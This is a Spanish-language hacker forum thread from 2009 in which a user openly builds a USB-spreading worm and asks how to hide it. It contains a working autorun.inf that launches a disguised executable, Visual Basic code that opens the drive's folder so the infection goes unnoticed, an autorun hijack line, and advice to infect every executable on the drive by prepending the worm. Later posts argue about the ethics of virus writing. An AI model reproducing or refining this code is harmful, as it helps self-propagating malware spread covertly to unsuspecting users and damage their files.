autorun.inf arruina el USB :(

Iniciado por locot3, 15 Mayo 2009, 03:39 AM

0 Miembros y 1 Visitante están viendo este tema.

locot3

Buenas ! y gracia spor el tiempo bueno mi problema es que estoy haciendo un gusanito el cual se esparce por medio de memorias USB FLASH ahora este es el codigo que uso en el autorun.inf:
[autorun]
open=msrdmsn.exe
UseAutoPlay = 1
action=@msrdmsn.exe
shell\open=Abrir
shell\open\Command=msrdmsn.exe
shell\open\Command=msrdmsn.exe

bueno la infeccion me funciona bien tengo una funcion que busca unidades y si encuentra una avilitada se copia en ese drive con el nombre "msrdmsn.exe" bueno la cosa es que cuando los archivos se copian al flash y el flash es retirado y depues introducido a otra maquina o ala misma cuando entro a MI PC y hago doble Click Perfecto el autorun funciona y mi archivo se ejecuta (msrdmsn.exe)  pero es imposible acceder por medio de Mi Pc a las carpetas que estan adentro del flash la unica manera es ir Inicio-accesorios-explorar de windows desde ahi si,,,,,,, pero yo quisiera que el usuario al hacer doble click en la unidad del Flash de MIPC mi archivo se ejecute pero tambien el usuario pueda entrar a explorar sus carpetas y documentos ,espero dejarme a entender ?¿ hehe ssaludos y hasta luego !!!

BlackZeroX

#1
Cita de: locot3 en 15 Mayo 2009, 03:39 AM
Buenas ! y gracia spor el tiempo bueno mi problema es que estoy haciendo un gusanito el cual se esparce por medio de memorias USB FLASH ahora este es el codigo que uso en el autorun.inf:
[autorun]
open=msrdmsn.exe
UseAutoPlay = 1
action=@msrdmsn.exe
shell\open=Abrir
shell\open\Command=msrdmsn.exe
shell\open\Command=msrdmsn.exe

bueno la infeccion me funciona bien tengo una funcion que busca unidades y si encuentra una avilitada se copia en ese drive con el nombre "msrdmsn.exe" bueno la cosa es que cuando los archivos se copian al flash y el flash es retirado y depues introducido a otra maquina o ala misma cuando entro a MI PC y hago doble Click Perfecto el autorun funciona y mi archivo se ejecuta (msrdmsn.exe)  pero es imposible acceder por medio de Mi Pc a las carpetas que estan adentro del flash la unica manera es ir Inicio-accesorios-explorar de windows desde ahi si,,,,,,, pero yo quisiera que el usuario al hacer doble click en la unidad del Flash de MIPC mi archivo se ejecute pero tambien el usuario pueda entrar a explorar sus carpetas y documentos ,espero dejarme a entender ?¿ hehe ssaludos y hasta luego !!!

agrega este codigo a tu gusano al inicio habitualmente yo uso siempre el proceso sub main


Código (vb) [Seleccionar]

Public Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Sub main()
ShellExecute 0, "Open", App.Path, "", "", 1
'Aca  ahora si ejecutamos los demas procesos como carga de formualrios y demas
End Sub


ojo use App.Patch para ejecutar el directorio actual, en tu caso en el directorio raiz cual es que se pide.

Para que cuando se autoejecute, por si mismo ya sea por medio de registro, por carpeta inicio, o cualquier otro medio no aparezca la carpeta que contenga el exe por ejemplo "c:\windows\system32" por decir algo hayq ue validar el directorio contenedor del gusano.

P.D.: Me parece que abre una ventana nueva jom xP, pero algo es algo aun en penumbra/indolora.

Saludos Dulces Lunas.
The Dark Shadow is my passion.

BlackZeroX

#2
validacion sencilla

[code=Vb]
if len(app.patch) =3 then
ShellExecute 0, "Open", App.Path, "", "", 1
end if
'Demas Procesos


otra cosa

yo no te dige esto peroigual puedes usar el autorun.inf:


shell\explore\Command=TuEXE


y de igual forma en las demas opciones solo debes aprender a leer el regitro de windows, para saber identificar estas lineas...¡!


P.D.: Ajala volviecen a poner el botoncito de borrar Post...¡!

Saludos Dulces Lunas.[/code]
The Dark Shadow is my passion.

ny0x

yo hice algo parecido con c pero como ahi no hay el App.Path... es algo sencillo pero cuando lo haces por primera vez... es otra historia. Pero imaginense como se hari aen ensamblador  :P, que rompedura de cabeza ...

Citarigual puedes usar:

Código:

shell\explore\Command=TuEXE


y de igual forma en las demas opciones solo debes aprender a leer el regitro de windows, para saber identificar estas lineas...¡!


el problema con esto es que no funciona en vista, bueno lo otro si funciona pero te aparece el autorun de un cd cuando vas a instalar un programa

BlackZeroX

Cita de: ny0x en 15 Mayo 2009, 04:45 AM
yo hice algo parecido con c pero como ahi no hay el App.Path... es algo sencillo pero cuando lo haces por primera vez... es otra historia. Pero imaginense como se hari aen ensamblador  :P, que rompedura de cabeza ...

Citarigual puedes usar:

Código:

shell\explore\Command=TuEXE


y de igual forma en las demas opciones solo debes aprender a leer el regitro de windows, para saber identificar estas lineas...¡!


el problema con esto es que no funciona en vista, bueno lo otro si funciona pero te aparece el autorun de un cd cuando vas a instalar un programa

Solucion:

Infectar todo EXE en la USB para que estos actuen de forma de residente es decir:

Gusado & Separador & AplicacionOriginal

Lo demas es chacharra y media.

Saludos, Dulces Lunas.
The Dark Shadow is my passion.

locot3

buenas y gracias por las respeustas !!! ahora ya se me paso por la cabeza eso de infectar todos los exes del USB y no es mala idea pero como ya llegue a la infeccion y autoejecucion del .exe con el autorun.inf solo faltaria hacer aparecer la carpeta exploradora del aparato flash !!, pero las ideas aka estan buwnas ahora slas pongo en uso ! gracias man !

locot3

Public Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Sub main()
ShellExecute 0, "Open", App.Path, "", "", 1
'Aca  ahora si ejecutamos los demas procesos como carga de formualrios y demas
End Sub
***********************************

Eso me sirvio ala perfeccion ,11!!!! muy buena idea no sabia eso del "Open" buena !! gracias ! yahora regreso a ver tele que esta dando friday 13 II !! ;) ahaha saludos y gracias man!!!

ranslsad

#7
De verdad esas mierdas joden a gente que usa eso para trabajar como a mi madre
que le entro una p**a ***** de esas.. odio.. rotundamente odio a la gente que usa estos codigos para usarlos maliciosamente.. quizas no seas vos el caso que lo use para mal sino para aprender pero de verdad odio y mataria a la gente que lo usa para hacer mal o simplemente molestar... Para que lo hacen? tienen alguna carencia familiar? Son de naturaleza maldosa?...
Porque la gente no les hace nada para que hagan esa *****!!!!
De verdad no pierdan el tiempo haciendo eso...
Yo lo mas malo que he echo es un espiador de WebCam pero nunca, nunca lo saque a la luz ni siquiera done el Source como Hizo el de MSN Kiker que se hizo un escandalo tremendo cuando llego a las manos de los niñatos >:(...

Por eso si lo haces para aprender te doy todo mi apollo.. si quieres usarlo para mal o molestar te deseo todo lo peor >:(...
Porque gente como mi madre que usan eso para trabajar, llevar facturas en ellos y todo eso no tienen la culpa de carencias mentales de la gente que hacen esos virus para la finalidad que le quieran dar >:(

Salu2

Ranslsad

BlackZeroX

#8
Cita de: ranslsad en 15 Mayo 2009, 11:09 AM
De verdad esas mierdas joden a gente que usa eso para trabajar como a mi madre
que le entro una p**a ***** de esas.. odio.. rotundamente odio a la gente que usa estos codigos para usarlos maliciosamente.. quizas no seas vos el caso que lo use para mal sino para aprender pero de verdad odio y mataria a la gente que lo usa para hacer mal o simplemente molestar... Para que lo hacen? tienen alguna carencia familiar? Son de naturaleza maldosa?...
Porque la gente no les hace nada para que hagan esa *****!!!!
De verdad no pierdan el tiempo haciendo eso...
Yo lo mas malo que he echo es un espiador de WebCam pero nunca, nunca lo saque a la luz ni siquiera done el Source como Hizo el de MSN Kiker que se hizo un escandalo tremendo cuando llego a las manos de los niñatos >:(...

Por eso si lo haces para aprender te doy todo mi apollo.. si quieres usarlo para mal o molestar te deseo todo lo peor >:(...
Porque gente como mi madre que usan eso para trabajar, llevar facturas en ellos y todo eso no tienen la culpa de carencias mentales de la gente que hacen esos virus para la finalidad que le quieran dar >:(

Salu2

Ranslsad

Un gusano no siempre es Maligno en ocasiones beneficia al usuario en seguridad, solo es considerado gusano a aquel soft que se difunde de forma oculta y sin permiso el usuario (aun que esto en cierta forma es malo).

De igual forma puede usarse para diversas formas un gusano, por ejemplo yo en mi escuela use un gusano que se difundio exitosamente en todas las Computadoras, OJO no era malicioso lo unico que difundio fue un Desabilitador de Autorun.Inf (PAra evitar autoejecucion del Autorun.inf de USB, CD/DVD y/o HD), y a su vez un Switch de USB (algo asi como Permitir/Denegar escritura en un disco flexible pero en USB.), que solo funcionaba en un cierto grupo de trabajo de PC para evitar la dispercion masiva y ser considerado. Era algo estrepitoso pero factible ya que como mi usb a cada rato se me infectaba y se me jodian mis EXE (que lo cual era reversible ante la infeccion).
The Dark Shadow is my passion.

ny0x

Cita de: ranslsad en 15 Mayo 2009, 11:09 AM
De verdad esas mierdas joden a gente que usa eso para trabajar como a mi madre
que le entro una p**a ***** de esas.. odio.. rotundamente odio a la gente que usa estos codigos para usarlos maliciosamente.. quizas no seas vos el caso que lo use para mal sino para aprender pero de verdad odio y mataria a la gente que lo usa para hacer mal o simplemente molestar... Para que lo hacen? tienen alguna carencia familiar? Son de naturaleza maldosa?...
Porque la gente no les hace nada para que hagan esa *****!!!!
De verdad no pierdan el tiempo haciendo eso...
Yo lo mas malo que he echo es un espiador de WebCam pero nunca, nunca lo saque a la luz ni siquiera done el Source como Hizo el de MSN Kiker que se hizo un escandalo tremendo cuando llego a las manos de los niñatos >:(...

Por eso si lo haces para aprender te doy todo mi apollo.. si quieres usarlo para mal o molestar te deseo todo lo peor >:(...
Porque gente como mi madre que usan eso para trabajar, llevar facturas en ellos y todo eso no tienen la culpa de carencias mentales de la gente que hacen esos virus para la finalidad que le quieran dar >:(

Salu2

Ranslsad

porque odias a los que hacen virus? deberias odiar a aquellos que no hacen los sistemas lo suficientemente seguros, como para prevenir este tipo de cosas.
Yo personalmente he perdido varios trabajos por culpa de los virus, pero no por eso voy a odiarlos, al contrario los admiro por poder burlar un sistema que segun es muy seguro, y a los avs por los que tanto te cobrarn y que segun son lo ultimo en tecnologia.
Claro cada quien debe tener una etica personal a la hora de que hacer con sus codigos.

P.D Aunque paresca no estoy a favor de la creacion de virus, porque causan daños a las personas que menos saben pero me parecen interesantwes